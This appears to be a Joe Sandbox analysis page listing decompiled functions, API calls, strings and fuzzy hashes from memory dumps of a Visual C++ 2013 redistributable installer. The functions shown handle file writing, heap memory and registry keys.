					_t14 = WriteFile(_a4, _a8 + _t24, _a12 - _t24,  &_v8, 0); // executed
					if(_t14 != 0) {
						goto L5;
					} else {
						_t16 = GetLastError();
						if(_t16 > 0) {
							_t16 = _t16 & 0x0000ffff | 0x80070000;
						}
						_t21 = _t16;
						if(_t21 < 0) {
							E012B294E(_t16, "fileutil.cpp", 0x34c, _t21);
						} else {
							goto L5;
						}
					}
					L8:
					return _t21;
					L5:
					_t24 = _t24 + _v8;
				} while (_t24 < _a12);
				goto L8;
			}

0x012b5789
0x012b578b
0x012b578e
0x012b5790
0x012b57a5
0x012b57ad
0x00000000
0x012b57af
0x012b57af
0x012b57b7
0x012b57be
0x012b57be
0x012b57c3
0x012b57c7
0x012b57de
0x00000000
0x00000000
0x00000000
0x012b57c7
0x012b57e3
0x012b57e8
0x012b57c9
0x012b57c9
0x012b57cc
0x00000000

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,012B58B2,?,?,00000000), ref: 012B57A5
GetLastError.KERNEL32(?,?,012B58B2,?,?,00000000), ref: 012B57AF

Strings

fileutil.cpp, xrefs: 012B57D9

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: fileutil.cpp
API String ID: 442123175-2967768451
Opcode ID: f06db895e717b3eaa7a29e3d402716b437256366cb6e7924f7b307b9e897ff09
Instruction ID: 68ac26fb1774fa7d0c5c8731566acf68a17b24ea558f2670c3739374d6d974fd
Opcode Fuzzy Hash: f06db895e717b3eaa7a29e3d402716b437256366cb6e7924f7b307b9e897ff09
Instruction Fuzzy Hash: 79F06872720216FBD7209E5ADC49FDF7FADEB90BE0F140025B918EB140D674EA0097A0

Uniqueness

Uniqueness Score: -1.00%

Function 012B6C5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32comCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,01281DEA,00000000,01281DEA,?,?), ref: 012B6C81
CoCreateInstance.OLE32(00000000,00000000,00000001,012D15F8,00000000), ref: 012B6C9A

Strings

Microsoft.Update.AutoUpdate, xrefs: 012B6C7C

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID: Microsoft.Update.AutoUpdate
API String ID: 2151042543-675569418
Opcode ID: ff809a96b2d1eb625334a9facca132b3fb27202b9ebe7940440bad4e9e2bf68f
Instruction ID: 37d3b35cb7c13a4b36961347a3a1dda6f2f927bd4024b036c1f4a5e6b9ed24cf
Opcode Fuzzy Hash: ff809a96b2d1eb625334a9facca132b3fb27202b9ebe7940440bad4e9e2bf68f
Instruction Fuzzy Hash: E9F0A731B50309BFDB00DBBDED4DEAFB7B8DB08704F400064A601E3044DA70AA048762

Uniqueness

Uniqueness Score: -1.00%

Function 01291256 Relevance: 4.5, APIs: 3, Instructions: 21
synchronizationwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01291256(intOrPtr _a4) {
				int _t5;
				intOrPtr _t8;

				_t8 = _a4;
				_t5 = IsWindow( *(_t8 + 0x3d0));
				if(_t5 != 0) {
					PostMessageW( *(_t8 + 0x3d0), 0x10, 0, 0); // executed
					return WaitForSingleObject( *(_t8 + 0x3d4), 0x3a98);
				}
				return _t5;
			}

0x0129125b
0x01291264
0x0129126c
0x0129127a
0x00000000
0x0129128b
0x01291294

APIs

IsWindow.USER32(?), ref: 01291264
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0129127A
WaitForSingleObject.KERNEL32(?,00003A98,?,01281A88,?,00000000,?,?,?,?,?,00000001,?,?,?,?), ref: 0129128B

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: MessageObjectPostSingleWaitWindow
String ID:
API String ID: 1391784381-0
Opcode ID: 1f86b13b281235b8f69faee5a7d38bcf6e45a9ef26fbc7fc63bb2b586f508e5c
Instruction ID: 2f4391151ac01d22d4af8183ca30bbae104eb427335f54758969682fb76cd544
Opcode Fuzzy Hash: 1f86b13b281235b8f69faee5a7d38bcf6e45a9ef26fbc7fc63bb2b586f508e5c
Instruction Fuzzy Hash: 8CE0BF31350305B7D7261B5AFC4AB95FB2DFB55BA1F004026F719A5094C7F165209794

Uniqueness

Uniqueness Score: -1.00%

Function 012B24F6 Relevance: 4.5, APIs: 3, Instructions: 18
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E012B24F6(void* _a4) {
				char _t3;
				signed int _t4;

				_t3 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
				if(_t3 != 0) {
					return 0;
				}
				_t4 = GetLastError();
				if(_t4 > 0) {
					return _t4 & 0x0000ffff | 0x80070000;
				}
				return _t4;
			}

0x012b2505
0x012b250d
0x00000000
0x012b250f
0x012b2513
0x012b251b
0x00000000
0x012b2522
0x012b2528

APIs

GetProcessHeap.KERNEL32(00000000,?,?,0128314C,?,?,?,?,00000000), ref: 012B24FE
RtlFreeHeap.NTDLL(00000000,?,0128314C,?,?,?,?,00000000), ref: 012B2505
GetLastError.KERNEL32(?,0128314C,?,?,?,?,00000000), ref: 012B2513

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: 55193e5224764b2a2d3f19bc5df7d5f6482eddbfd4ee7ea75622399e9af83016
Instruction ID: 4bf3377d0ec93220e2473d7416444640d83d5ec197da67caca5f2a56424d67ac
Opcode Fuzzy Hash: 55193e5224764b2a2d3f19bc5df7d5f6482eddbfd4ee7ea75622399e9af83016
Instruction Fuzzy Hash: 6BD05E72660317EBDB311AB5FC9DB6A3E9CAF147C1F044430B706C6180DA6ED0108B65

Uniqueness

Uniqueness Score: -1.00%

Function 012B526F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E012B526F(intOrPtr __edx, char* _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v28;
				short _v30;
				void _v32;
				void* _v36;
				intOrPtr* _v40;
				char _v44;
				void* _v52;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				intOrPtr _t36;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr* _t54;
				signed int _t55;
				short _t60;
				intOrPtr _t62;
				char* _t67;
				signed int _t68;

				_t62 = __edx;
				_t29 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t29 ^ _t68;
				_t67 = _a4;
				_v40 = _a12;
				_t55 = 6;
				memset( &_v32, 0, _t55 << 2);
				_v36 = 0;
				_v44 = 0;
				__imp__#8( &_v60);
				_t36 = E012B50CA(0,  &_v36, 0); // executed
				_t65 = _t36;
				if(_t65 == 1) {
					_t65 = 0x80004005;
				}
				_t54 = _v36;
				if(_t65 >= 0) {
					_t42 =  *((intOrPtr*)( *_t54 + 0x110))(_t54, 0);
					_t65 = _t42;
					if(_t42 >= 0) {
						_t44 =  *((intOrPtr*)( *_t54 + 0x118))(_t54, 0);
						_t65 = _t44;
						if(_t44 >= 0) {
							_v32 = 1;
							_t60 = 0x12;
							_v28 = 1;
							_v30 = _t60;
							_v16 = _a8;
							_v20 = _t67;
							_v60 = 0x2011;
							_v52 =  &_v32;
							_t67 =  &_v60;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd"); // executed
							_t65 =  *((intOrPtr*)( *_t54 + 0xe8))(_t54,  &_v44);
							if(_t65 == 1) {
								_t65 = 0x8007006e;
							}
							if(_t65 >= 0) {
								 *_v40 = _t54;
								_t54 = 0;
							}
						}
					}
				}
				if(_t54 != 0) {
					 *((intOrPtr*)( *_t54 + 8))(_t54);
				}
				return E012A7EAA(_t65, _t54, _v8 ^ _t68, _t62, _t65, _t67);
			}

0x012b526f
0x012b5275
0x012b527c
0x012b5284
0x012b528a
0x012b528d
0x012b5293
0x012b529b
0x012b529e
0x012b52a1
0x012b52ad
0x012b52b2
0x012b52b7
0x012b52b9
0x012b52b9
0x012b52c0
0x012b52c3
0x012b52ca
0x012b52d0
0x012b52d4
0x012b52db
0x012b52e1
0x012b52e5
0x012b52ee
0x012b52f2
0x012b52f3
0x012b52f9
0x012b52fd
0x012b5300
0x012b530c
0x012b5316
0x012b531d
0x012b5320
0x012b5321
0x012b5322
0x012b5324
0x012b532b
0x012b5330
0x012b5332
0x012b5332
0x012b5339
0x012b533e
0x012b5340
0x012b5340
0x012b5339
0x012b52e5
0x012b52d4
0x012b5344
0x012b5349
0x012b5349
0x012b535c

APIs

VariantInit.OLEAUT32(?), ref: 012B52A1

Part of subcall function 012B50CA: GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,?,?,012B52B2,00000000,?,00000000), ref: 012B50E8
Part of subcall function 012B50CA: GetLastError.KERNEL32(?,?,012B52B2,00000000,?,00000000,?,?,?,?,?,?,?,?,012A386B,01282222), ref: 012B50F4

Strings

WixBundleElevated, xrefs: 012B5282

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID: WixBundleElevated
API String ID: 52713655-4097796520
Opcode ID: a93b79c47b9e836f3b4dbe72b8e2884bcdb906d9b9f8d84eb2a2688a4961e8ed
Instruction ID: abd70e241c48bcf28b3f96514cea9adc9941d9d9ac1b14d7eeb5e736b6ba5ebf
Opcode Fuzzy Hash: a93b79c47b9e836f3b4dbe72b8e2884bcdb906d9b9f8d84eb2a2688a4961e8ed
Instruction Fuzzy Hash: 2B312F76A102199FCB00DFA8D8C4AEEBBF9FF89310F154469EA05EB301DA75D9058B64

Uniqueness

Uniqueness Score: -1.00%

Function 012B34CC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76
registryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E012B34CC(void* __ebx, void* _a4, short* _a8, char** _a12) {
				int _v8;
				char _v12;
				int _v16;
				void* __edi;
				void* __esi;
				signed int _t22;
				signed int _t24;
				void* _t30;
				signed int _t31;
				signed int _t34;

				_t30 = __ebx;
				_t34 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 8;
				_t22 = RegQueryValueExW(_a4, _a8, 0,  &_v8,  *_a12,  &_v16); // executed
				_t31 = _t22;
				if(_t22 > 0) {
					_t31 = _t31 & 0x0000ffff | 0x80070000;
				}
				if(_t31 != 0x80070002) {
					__eflags = _v8 - 1;
					if(_v8 == 1) {
						L15:
						_t24 = E012B31D0(_t30, _t34, 0xffff, _a4, _a8,  &_v12); // executed
						_t34 = _t24;
						__eflags = _t34;
						if(_t34 >= 0) {
							_t34 = E012B5D5F(_t31, 0x80070000, _v12, 0, _a12);
						}
						goto L17;
					}
					__eflags = _v8 - 2;
					if(_v8 == 2) {
						goto L15;
					}
					__eflags = _v8 - 0xb;
					if(_v8 != 0xb) {
						_t34 = 0x8007070c;
						_push(0x8007070c);
						_push(0x270);
						L14:
						_push("regutil.cpp");
						E012B294E(_t22);
						goto L17;
					}
					__eflags = _t22;
					if(__eflags == 0) {
						goto L17;
					}
					if(__eflags > 0) {
						_t22 = _t22 & 0x0000ffff | 0x80070000;
						__eflags = _t22;
					}
					_t34 = _t22;
					__eflags = _t34;
					if(_t34 >= 0) {
						_t34 = 0x80004005;
					}
					_push(_t34);
					_push(0x26b);
					goto L14;
				} else {
					_t34 = _t31;
					L17:
					if(_v12 != 0) {
						E012B01E8(_v12);
					}
					return _t34;
				}
			}

0x012b34cc
0x012b34e1
0x012b34e7
0x012b34ed
0x012b34f0
0x012b34f7
0x012b3507
0x012b350b
0x012b350f
0x012b350f
0x012b3517
0x012b351d
0x012b3521
0x012b3563
0x012b356d
0x012b3572
0x012b3574
0x012b3576
0x012b3585
0x012b3585
0x00000000
0x012b3576
0x012b3523
0x012b3527
0x00000000
0x00000000
0x012b3529
0x012b352d
0x012b354c
0x012b3551
0x012b3552
0x012b3557
0x012b3557
0x012b355c
0x00000000
0x012b355c
0x012b352f
0x012b3531
0x00000000
0x00000000
0x012b3533
0x012b3537
0x012b3537
0x012b3537
0x012b3539
0x012b353b
0x012b353d
0x012b353f
0x012b353f
0x012b3544
0x012b3545
0x00000000
0x012b3519
0x012b3519
0x012b3587
0x012b358b
0x012b3590
0x012b3590
0x012b359a
0x012b359a

APIs

RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000000,?,?), ref: 012B34F7

Strings

regutil.cpp, xrefs: 012B3557

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: QueryValue
String ID: regutil.cpp
API String ID: 3660427363-955085611
Opcode ID: 34745826a98996e9a985f271cd0be7c7f4d30700ae8df688daa5bd90f6228599
Instruction ID: 0bc6d57359fa70ce81b48e067ae32e615d4a979fe596e5778c703cb74c78e256
Opcode Fuzzy Hash: 34745826a98996e9a985f271cd0be7c7f4d30700ae8df688daa5bd90f6228599
Instruction Fuzzy Hash: 9A21FC76920106FBCF11DA58DC89AEE7F7AFFC8390F248069FA05A7150D670D641DB10

Uniqueness

Uniqueness Score: -1.00%

Function 012B371B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B371B(void* _a4, short* _a8, int _a12, intOrPtr _a16, struct _SECURITY_ATTRIBUTES* _a20, int _a24, signed int* _a28) {
				signed int _t17;
				signed int* _t18;
				signed int _t24;
				signed int _t26;

				_t24 = 0;
				_t17 = RegCreateKeyExW(_a4, _a8, 0, 0, 0 | _a16 != 0x00000000, _a12, _a20, _a24,  &_a24); // executed
				_t26 = _t17;
				if(_t26 == 0) {
					_t18 = _a28;
					if(_t18 != 0) {
						 *_t18 = 0 | _a24 == 0x00000001;
					}
				} else {
					if(_t26 > 0) {
						_t17 = _t17 & 0x0000ffff | 0x80070000;
					}
					_t24 = _t17;
					if(_t24 >= 0) {
						_t24 = 0x80004005;
					}
					E012B294E(_t17, "regutil.cpp", 0x90, _t24);
				}
				return _t24;
			}

0x012b372b
0x012b373f
0x012b3745
0x012b3747
0x012b3772
0x012b3777
0x012b3782
0x012b3782
0x012b3749
0x012b3749
0x012b3750
0x012b3750
0x012b3755
0x012b3759
0x012b375b
0x012b375b
0x012b376b
0x012b376b
0x012b3788

APIs

RegCreateKeyExW.KERNELBASE(00000001,00000000,00000000,00000000,00000000,00000001,012813BB,?,?,00000001,?,01287275,?,012813BB,00020006,00000001), ref: 012B373F

Strings

regutil.cpp, xrefs: 012B3766

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Create
String ID: regutil.cpp
API String ID: 2289755597-955085611
Opcode ID: 4348808ae1dc28ba56b1a63fdad4746c1a287dee83a48b4cea88b13b67d95c5b
Instruction ID: 75e015910885b230096ff37210b99a8c54528e779615719c8191e69a0c073b7f
Opcode Fuzzy Hash: 4348808ae1dc28ba56b1a63fdad4746c1a287dee83a48b4cea88b13b67d95c5b
Instruction Fuzzy Hash: ABF0A47266021BEBDB258E55DC45AFB7E98FF047A0F014034BE04D6050D235D920EBE0

Uniqueness

Uniqueness Score: -1.00%

Function 012B378B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B378B(void* _a4, short* _a8, int _a12, void** _a16) {
				signed int _t5;
				signed int _t9;
				signed int _t10;

				_t9 = 0;
				_t5 = RegOpenKeyExW(_a4, _a8, 0, _a12, _a16); // executed
				_t10 = _t5;
				if(_t5 > 0) {
					_t10 = _t10 & 0x0000ffff | 0x80070000;
				}
				if(_t10 != 0x80070002) {
					__eflags = _t5;
					if(__eflags != 0) {
						if(__eflags > 0) {
							_t5 = _t5 & 0x0000ffff | 0x80070000;
							__eflags = _t5;
						}
						_t9 = _t5;
						__eflags = _t9;
						if(_t9 >= 0) {
							_t9 = 0x80004005;
						}
						E012B294E(_t5, "regutil.cpp", 0xaf, _t9);
					}
				} else {
					_t9 = _t10;
				}
				return _t9;
			}

0x012b3793
0x012b379f
0x012b37af
0x012b37b3
0x012b37b7
0x012b37b7
0x012b37bf
0x012b37c5
0x012b37c7
0x012b37c9
0x012b37cd
0x012b37cd
0x012b37cd
0x012b37cf
0x012b37d1
0x012b37d3
0x012b37d5
0x012b37d5
0x012b37e5
0x012b37e5
0x012b37c1
0x012b37c1
0x012b37c1
0x012b37ef

APIs

RegOpenKeyExW.KERNELBASE(?,00000000,00000000,01291F19,?,00000009,00000000,?,01291BE1,80000002,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000001), ref: 012B379F

Strings

regutil.cpp, xrefs: 012B37E0

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Open
String ID: regutil.cpp
API String ID: 71445658-955085611
Opcode ID: cfea602b6e6aa71a3eae64abff6e8ccb65c1f349eb682c3b7af7b1afa1f82db9
Instruction ID: 2b8203040919c9c89b196db0498fd8ac1920b6650c39415c108e3b0a5b00e1cf
Opcode Fuzzy Hash: cfea602b6e6aa71a3eae64abff6e8ccb65c1f349eb682c3b7af7b1afa1f82db9
Instruction Fuzzy Hash: 74F0E9B136031BAFEB185D699CD5AB63A8DBF147E0F144038FB05CA151D596CC106390

Uniqueness

Uniqueness Score: -1.00%

Function 012B36CB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B36CB(void* _a4, short* _a8, int _a12, void** _a16) {
				signed int _t5;
				signed int _t10;
				signed int _t11;

				_t10 = 0;
				_t5 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
				_t11 = _t5;
				if(_t11 != 0) {
					if(_t11 > 0) {
						_t5 = _t5 & 0x0000ffff | 0x80070000;
					}
					_t10 = _t5;
					if(_t10 >= 0) {
						_t10 = 0x80004005;
					}
					E012B294E(_t5, "regutil.cpp", 0x76, _t10);
				}
				return _t10;
			}

0x012b36d6
0x012b36e5
0x012b36eb
0x012b36ed
0x012b36ef
0x012b36f6
0x012b36f6
0x012b36fb
0x012b36ff
0x012b3701
0x012b3701
0x012b370e
0x012b370e
0x012b3718

APIs

RegCreateKeyExW.KERNELBASE(00020006,?,00000000,00000000,00000000,?,00000000,0128696E,00000000,00000000,00000001,?,0128696E,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006), ref: 012B36E5

Strings

regutil.cpp, xrefs: 012B3709

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Create
String ID: regutil.cpp
API String ID: 2289755597-955085611
Opcode ID: 3d53ee598f0e71053c80ccc6b840073cbf8eadc02f7527765f8ec91ee13acb17
Instruction ID: 46bbea8dc9096837517e6d510c01585668d03e05937a6251f6b161ac7ee5c044
Opcode Fuzzy Hash: 3d53ee598f0e71053c80ccc6b840073cbf8eadc02f7527765f8ec91ee13acb17
Instruction Fuzzy Hash: B2F0E533910066B7D730595BDD4DED77E29EBD2BE0F050028FA18DA010D1668820D2F0

Uniqueness

Uniqueness Score: -1.00%

Function 012B362A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B362A(void* _a4, short* _a8, char _a12) {
				signed int _t5;
				signed int _t9;
				signed int _t10;

				_t9 = 0;
				_t5 = RegSetValueExW(_a4, _a8, 0, 4,  &_a12, 4); // executed
				_t10 = _t5;
				if(_t10 != 0) {
					if(_t10 > 0) {
						_t5 = _t5 & 0x0000ffff | 0x80070000;
					}
					_t9 = _t5;
					if(_t9 >= 0) {
						_t9 = 0x80004005;
					}
					E012B294E(_t5, "regutil.cpp", 0x364, _t9);
				}
				return _t9;
			}

0x012b3636
0x012b363f
0x012b3645
0x012b3647
0x012b3649
0x012b3650
0x012b3650
0x012b3655
0x012b3659
0x012b365b
0x012b365b
0x012b366b
0x012b366b
0x012b3674

APIs

RegSetValueExW.KERNELBASE(?,00020006,00000000,00000004,012868E2,00000004,00000001,?,012868E2,00020006,Resume,012813BB,00000000,00000000,?,?), ref: 012B363F

Strings

regutil.cpp, xrefs: 012B3666

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Value
String ID: regutil.cpp
API String ID: 3702945584-955085611
Opcode ID: 87d14099f254f78451c36f18d8981011851fee988fd982d13901421564298159
Instruction ID: d334760769efdc0be7b132bd6abed41f216743eb46b6b656aee1ebaee4bf30f7
Opcode Fuzzy Hash: 87d14099f254f78451c36f18d8981011851fee988fd982d13901421564298159
Instruction Fuzzy Hash: D7E06D32AA122ABBE730A995DC49FE76E08EB00BE0F058134BF18DA190D575C91082E4

Uniqueness

Uniqueness Score: -1.00%

Function 012B235D Relevance: 3.0, APIs: 2, Instructions: 14
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E012B235D(void* _a4, long _a8, signed int _a12) {
				void* _t8;

				asm("sbb eax, eax");
				_t8 = RtlReAllocateHeap(GetProcessHeap(),  ~_a12 & 0x00000008, _a4, _a8); // executed
				return _t8;
			}

0x012b236b
0x012b2378
0x012b237f

APIs

GetProcessHeap.KERNEL32(?,?,00000340,?,012B097E,?,00000340,00000001,?,00000000,?,?,?,?,012AF6D3,?), ref: 012B2371
RtlReAllocateHeap.NTDLL(00000000,?,012B097E,?,00000340,00000001,?,00000000,?,?,?,?,012AF6D3,?,00000340,00000000), ref: 012B2378

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 6376986d7871061d564f127e390d79c4fcd72cc6607193fbe98a74292e591689
Instruction ID: 6f39e1504d5464c0eea7cd89bb26d1c753a72f88d1da6a0258d53ac775221386
Opcode Fuzzy Hash: 6376986d7871061d564f127e390d79c4fcd72cc6607193fbe98a74292e591689
Instruction Fuzzy Hash: 42D0C932194219BB8F005FB4EC4DC9A7B6CEB143127048401F915C3100D63AD0209B60

Uniqueness

Uniqueness Score: -1.00%

Function 012B233B Relevance: 3.0, APIs: 2, Instructions: 13
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E012B233B(long _a4, signed int _a8) {
				void* _t7;

				asm("sbb eax, eax");
				_t7 = RtlAllocateHeap(GetProcessHeap(),  ~_a8 & 0x00000008, _a4); // executed
				return _t7;
			}

0x012b2346
0x012b2353
0x012b235a

APIs

GetProcessHeap.KERNEL32(?,00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B234C
RtlAllocateHeap.NTDLL(00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B2353

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

